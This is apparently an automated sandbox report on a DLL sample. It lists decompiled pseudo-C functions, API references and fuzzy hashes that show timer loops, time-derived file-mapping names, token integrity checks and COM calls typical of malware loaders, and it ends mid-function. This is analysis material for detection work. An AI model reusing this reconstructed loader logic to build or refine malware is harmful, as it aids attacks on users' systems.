0x007dade0
0x007dade1
0x007dade4
0x007dade7
0x007dadea
0x007dadef
0x007dadfe
0x00000000
0x007dae04
0x007dae0e
0x007dae18
0x007dae1d
0x007dae1f
0x007dae29
0x007dae2c
0x007dae2f
0x007dae35
0x007dae37
0x007dae37
0x007dae3a
0x007dae3d
0x007dae42
0x007dae46
0x007dae59
0x007dae5b
0x007daf03
0x007daf03
0x007daf0a
0x007daf0d
0x007daf17
0x007daf17
0x007daf1b
0x007daf99
0x007daf9c
0x007daf9e
0x007daf9e
0x007dafa5
0x007dafa7
0x007dafb1
0x007dafb4
0x007dafb7
0x007dafb7
0x00000000
0x007daf1d
0x007daf20
0x007daf4e
0x007daf58
0x007daf5c
0x007daf64
0x007daf67
0x007daf6e
0x007daf78
0x007daf78
0x007daf7c
0x007daf81
0x007daf90
0x007daf96
0x007daf96
0x007daf7c
0x00000000
0x007daf27
0x007daf2a
0x007daf32
0x007daf47
0x007daf4c
0x00000000
0x00000000
0x007daf4c
0x00000000
0x007daf32
0x007daf20
0x007daf1b
0x007dae61
0x007dae68
0x007dae78
0x007dae7b
0x007dae81
0x007dae85
0x007daec8
0x007daed4
0x007daefd
0x007daed6
0x007daeda
0x007daee0
0x007daee8
0x007daeea
0x007daeed
0x007daef3
0x007daef5
0x007daef5
0x007daee8
0x007daeda
0x00000000
0x007daed4
0x007dae8d
0x007dae90
0x007dae97
0x007daea7
0x007daeaa
0x007daeba
0x00000000
0x007daec0
0x007daea1
0x007daea5
0x00000000
0x00000000
0x00000000
0x007daea5
0x007dae72
0x007dae76
0x00000000
0x00000000
0x00000000
0x007dae76
0x007dae4f
0x007dae53
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007DADFE
LoadLibraryA.KERNELBASE(?), ref: 007DAE7B
GetLastError.KERNEL32 ref: 007DAE87
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 007DAEBA

Strings

$, xrefs: 007DADD3

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 7cdf8b67d772bfa73183aeec1ada54033e8aee7d7598b6d69d4bc0c5c453f5f6
Instruction ID: 8a4e48af27d75e9acc8be3dac5728e7e70f912410e6095f714543724f939ba63
Opcode Fuzzy Hash: 7cdf8b67d772bfa73183aeec1ada54033e8aee7d7598b6d69d4bc0c5c453f5f6
Instruction Fuzzy Hash: 0D8128B1A01209AFDB21CFA8D981BAEB7F5FB48310F11816AE905E7350E778ED41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 007D9E92, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E007D9E92(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				long _t67;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x7dd240);
					_v20 = 0;
					_v16 = 0;
					L007DB068();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x7dd26c; // 0x274
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x7dd24c = 5;
						} else {
							_t68 = E007D3B20(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x7dd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E007D4BEF(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_t67 = E007D373C(_t72, _t90,  &_v92, _a4, _a8); // executed
							_v8.LowPart = _t67;
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x7dd244);
							goto L21;
						} else {
							__eflags =  *0x7dd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E007D48E8();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x7dd248);
								L21:
								L007DB068();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							RtlFreeHeap( *0x7dd238, 0, _t54); // executed
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x007d9e92
0x007d9ea4
0x007d9ea7
0x007d9eb3
0x007d9ebb
0x007d9ebe
0x007da025
0x007d9ec4
0x007d9ec4
0x007d9ec6
0x007d9ecb
0x007d9ecc
0x007d9ed2
0x007d9ed5
0x007d9ed8
0x007d9ee6
0x007d9ef1
0x007d9ef4
0x007d9ef6
0x007d9f03
0x007d9f0d
0x007d9f11
0x007d9f14
0x007d9f19
0x007d9f24
0x007d9f24
0x007d9f1b
0x007d9f1b
0x007d9f22
0x00000000
0x00000000
0x007d9f22
0x007d9f2e
0x00000000
0x007d9f31
0x007d9f35
0x007d9f40
0x007d9f40
0x007d9f47
0x007d9f50
0x007d9f57
0x007d9f60
0x007d9f63
0x007d9f66
0x007d9f6d
0x007d9f70
0x00000000
0x00000000
0x007d9f72
0x007d9f75
0x007d9f78
0x007d9f7b
0x00000000
0x007d9f7d
0x007d9f87
0x007d9f8c
0x007d9f8c
0x00000000
0x007d9fba
0x007d9fba
0x007d9fbf
0x007d9fde
0x007d9fe0
0x007d9fe5
0x007d9fe6
0x00000000
0x007d9fc1
0x007d9fc1
0x007d9fc7
0x00000000
0x007d9fc9
0x007d9fc9
0x007d9fce
0x007d9fd0
0x007d9fd5
0x007d9fd6
0x007d9fec
0x007d9fec
0x007d9ff4
0x007d9fff
0x007da002
0x007da00d
0x007da00f
0x007da011
0x007da014
0x00000000
0x007da01a
0x00000000
0x007da01a
0x007da014
0x007d9fc7
0x00000000
0x007d9fbf
0x007d9f8f
0x007d9f91
0x007d9f94
0x007d9f95
0x007d9f95
0x007d9f99
0x007d9fa3
0x007d9fa3
0x007d9fa9
0x007d9fac
0x007d9fac
0x007d9fb2
0x007d9fb2
0x007da02f
0x00000000

APIs

memset.NTDLL ref: 007D9EA7
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 007D9EB3
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 007D9ED8
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 007D9EF4
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 007D9F0D
RtlFreeHeap.NTDLL(00000000,00000000), ref: 007D9FA3
CloseHandle.KERNEL32(?), ref: 007D9FB2
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 007D9FEC
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,007D5A08,?), ref: 007DA002
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 007DA00D

Part of subcall function 007D3B20: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,033B9388,00000000,?,73BCF710,00000000,73BCF730), ref: 007D3B6F
Part of subcall function 007D3B20: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,033B93C0,?,00000000,30314549,00000014,004F0053,033B937C), ref: 007D3C0C
Part of subcall function 007D3B20: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007D9F20), ref: 007D3C1E

GetLastError.KERNEL32 ref: 007DA01F

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 14b494b7298dc5be9c0e9e32aab34f41b8f688c7cbee06edec07c3fb6a32f46a
Instruction ID: b23509ab6e42b9fcba1258bdb3a840a1fd15a194365593773d7d1894ec4a6ae8
Opcode Fuzzy Hash: 14b494b7298dc5be9c0e9e32aab34f41b8f688c7cbee06edec07c3fb6a32f46a
Instruction Fuzzy Hash: 9B511B71905229EBDF219F94DC44DEEBFB8EB49324F208217F510E6290D7789A44DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007D9188, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E007D9188(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L007DB062();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x7dd27c; // 0x2bda5a8
				_t5 = _t13 + 0x7de862; // 0x33b8e0a
				_t6 = _t13 + 0x7de59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L007DACFA();
				_t17 = CreateFileMappingW(0xffffffff, 0x7dd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x007d9188
0x007d9190
0x007d9194
0x007d919a
0x007d919f
0x007d91a4
0x007d91a7
0x007d91aa
0x007d91af
0x007d91b0
0x007d91b3
0x007d91b8
0x007d91bf
0x007d91c9
0x007d91cb
0x007d91cc
0x007d91cf
0x007d91eb
0x007d91f1
0x007d91f5
0x007d9243
0x007d91f7
0x007d9204
0x007d9214
0x007d921c
0x007d922e
0x007d9232
0x00000000
0x00000000
0x007d921e
0x007d9221
0x007d9226
0x007d9228
0x007d9228
0x007d9206
0x007d9208
0x007d9234
0x007d9235
0x007d9235
0x007d9204
0x007d924a

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,007D58DB,?,?,4D283A53,?,?), ref: 007D9194
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 007D91AA
_snwprintf.NTDLL ref: 007D91CF
CreateFileMappingW.KERNELBASE(000000FF,007DD2A8,00000004,00000000,00001000,?), ref: 007D91EB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,007D58DB,?,?,4D283A53), ref: 007D91FD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 007D9214
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,007D58DB,?,?), ref: 007D9235
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,007D58DB,?,?,4D283A53), ref: 007D923D

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: cf2d98c15d8bf0dcfa281f28a8140d7c703b21c289b7e80c708e73ca84e0611c
Instruction ID: 05c141d549586569425b25a64cb6e7cb954c74a9ad41dba3ccb2a53b4d39d82d
Opcode Fuzzy Hash: cf2d98c15d8bf0dcfa281f28a8140d7c703b21c289b7e80c708e73ca84e0611c
Instruction Fuzzy Hash: 5B21E472601204FBC722ABA4DC09F9E77B9BB48750F248167F719E72D0DB78A901CB54

Uniqueness

Uniqueness Score: -1.00%

Function 007D7BD6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E007D7BD6(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x7dd270; // 0xd448b889
				_t1 =  &_a4; // 0x7d37eb
				_t32 =  *_t1;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x7dd27c; // 0x2bda5a8
				_t3 = _t8 + 0x7de862; // 0x61636f4c
				_t25 = 0;
				_t30 = E007D9111(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x7dd2a8, 1, 0, _t30);
					E007D6EF8(_t30);
				}
				_t12 =  *0x7dd25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E007D6F44(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E007D9E28(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E007D3D90(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x007d7bd7
0x007d7bde
0x007d7bde
0x007d7be8
0x007d7bec
0x007d7bf2
0x007d7c01
0x007d7c08
0x007d7c0c
0x007d7c1e
0x007d7c20
0x007d7c20
0x007d7c25
0x007d7c2c
0x007d7c81
0x007d7c81
0x007d7c87
0x007d7c89
0x007d7c89
0x007d7c93
0x007d7c97
0x007d7ca9
0x007d7ca9
0x007d7cad
0x007d7cb3
0x007d7cb3
0x00000000
0x007d7c3c
0x007d7c3c
0x007d7c43
0x00000000
0x00000000
0x007d7c4a
0x007d7c52
0x007d7c54
0x007d7c58
0x007d7c58
0x007d7c60
0x007d7c65
0x007d7c69
0x007d7c6d
0x007d7cc2
0x007d7cc8
0x007d7cc8
0x007d7c7b
0x007d7c7f
0x007d7cb6
0x007d7cb8
0x007d7cbb
0x007d7cbb
0x00000000
0x007d7cb8
0x007d7c7f
0x00000000
0x007d7c69

APIs

Part of subcall function 007D9111: lstrlen.KERNEL32(007D59DA,00000000,00000000,00000027,00000005,00000000,00000000,007D93BE,74666F53,00000000,007D59DA,007DD00C,?,007D59DA), ref: 007D9147
Part of subcall function 007D9111: lstrcpy.KERNEL32(00000000,00000000), ref: 007D916B
Part of subcall function 007D9111: lstrcat.KERNEL32(00000000,00000000), ref: 007D9173

CreateEventA.KERNEL32(007DD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,007D37EB,?,00000001,?), ref: 007D7C17

Part of subcall function 007D6EF8: RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

StrChrW.SHLWAPI(7},00000020,61636F4C,00000001,00000000,00000001,?,00000000,?,007D37EB,?,00000001,?), ref: 007D7C4A
WaitForSingleObject.KERNEL32(00000000,00004E20,7},00000000,00000000,?,00000000,?,007D37EB,?,00000001,?,?,?,?,007D9F8C), ref: 007D7C75
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,007D37EB,?,00000001,?), ref: 007D7CA3
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,007D37EB,?,00000001,?,?,?,?,007D9F8C), ref: 007D7CBB

Strings

7}, xrefs: 007D7BDE, 007D7C47, 007D7C5B

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID: 7}
API String ID: 73268831-1518483753
Opcode ID: 7b680b1aadd5afe3b635e185c39351a1f31755b68f76708d42a6e0758bc1c7f8
Instruction ID: 1eb51b861f0a28787ff6d1db97d6d52a11b6a22a251ee93993335cb8000247c6
Opcode Fuzzy Hash: 7b680b1aadd5afe3b635e185c39351a1f31755b68f76708d42a6e0758bc1c7f8
Instruction Fuzzy Hash: 3E212632A15201AFC7355BA89D88A6B73FCEB88710B05461BFA49EB340F72CCC00C6B4

Uniqueness

Uniqueness Score: -1.00%

Function 007D10DF, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E007D10DF(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x7dd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E007D3727(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E007D6EF8(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x007d10ec
0x007d10f3
0x007d10fa
0x007d110e
0x007d1119
0x007d1131
0x007d113e
0x007d1141
0x007d1146
0x007d1151
0x007d1155
0x007d1164
0x007d1168
0x007d1184
0x007d1184
0x007d1188
0x007d1188
0x007d118d
0x007d1191
0x007d1197
0x007d1198
0x007d119f
0x007d11a5

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 007D1111
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 007D1131
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 007D1141
CloseHandle.KERNEL32(00000000), ref: 007D1191

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 007D1164
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 007D116C
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 007D117C

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: be0214d67eb5d81d44e155d4773079e295616d68ae550fec6f31dea70bc510c1
Instruction ID: c51208dbf44dbd310a72f6ebbfb08882a562877fc5099e5ed72981c3bb64af09
Opcode Fuzzy Hash: be0214d67eb5d81d44e155d4773079e295616d68ae550fec6f31dea70bc510c1
Instruction Fuzzy Hash: 97213C7590024DFFEB119F94DC84EAEBB79EB44304F0040A6F610A6261C7759E05EB60

Uniqueness

Uniqueness Score: -1.00%

Function 007D393E, Relevance: 9.2, APIs: 6, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 007D397F
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 007D3A01
StrStrIW.SHLWAPI(?,006E0069), ref: 007D3A40
SysFreeString.OLEAUT32(?), ref: 007D3A62

Part of subcall function 007D4D36: SysAllocString.OLEAUT32(007DC2B0), ref: 007D4D86

SafeArrayDestroy.OLEAUT32(?), ref: 007D3AB6
SysFreeString.OLEAUT32(?), ref: 007D3AC4

Part of subcall function 007D4CD6: Sleep.KERNELBASE(000001F4), ref: 007D4D1E

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 2c0a55af78503db6dad260ffd21f72688b4c9cbb864152d604e7ad0b05af211b
Instruction ID: e1d90a9505895282852ce501c030b5950832ae03192287cd5be8d30fa46b1dc2
Opcode Fuzzy Hash: 2c0a55af78503db6dad260ffd21f72688b4c9cbb864152d604e7ad0b05af211b
Instruction Fuzzy Hash: 04511F72A00209EFCB11DFA4C9888AEB7B6FF88340B14C92AF555EB310D7759E45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 007DA552, Relevance: 9.1, APIs: 6, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 007D5298: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,033B89D8,007DA582,?,?,?,?,?,?,?,?,?,?,?,007DA582), ref: 007D5364

Part of subcall function 007D5037: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 007D5074
Part of subcall function 007D5037: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 007D50A5

SysAllocString.OLEAUT32(00000000), ref: 007DA5AE
SysAllocString.OLEAUT32(0070006F), ref: 007DA5C2
SysAllocString.OLEAUT32(00000000), ref: 007DA5D4
SysFreeString.OLEAUT32(00000000), ref: 007DA638
SysFreeString.OLEAUT32(00000000), ref: 007DA647
SysFreeString.OLEAUT32(00000000), ref: 007DA652

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: 16a892fbaeae5a1f4365e8692e04a921d1b142a1eefbed10a328ff7887fd25f5
Instruction ID: bed958ae3038e78808e2827047ee13dbcf3cc6e63786fbbcbc21e2b4b5edfc0b
Opcode Fuzzy Hash: 16a892fbaeae5a1f4365e8692e04a921d1b142a1eefbed10a328ff7887fd25f5
Instruction Fuzzy Hash: 91312F32D00609EBDB01DFB8C848A9EB7BABF49310F184566ED11EB260DB75DD06CB52

Uniqueness

Uniqueness Score: -1.00%

Function 007D584C, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E007D584C(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E007D7D74();
				if(_t21 != 0) {
					_t59 =  *0x7dd25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x7dd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x7dd164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E007D411B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x7dd27c; // 0x2bda5a8
					if( *0x7dd25c > 5) {
						_t8 = _t26 + 0x7de5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x7dea15; // 0x44283a44
						_t27 = _t7;
					}
					E007D4BC9(_t27, _t27);
					_t31 = E007D9188(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x7dd270 =  *0x7dd270 ^ 0x81bbe65d;
						_t32 = E007D3727(0x60);
						__eflags = _t32;
						 *0x7dd32c = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x7dd32c; // 0x33b95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
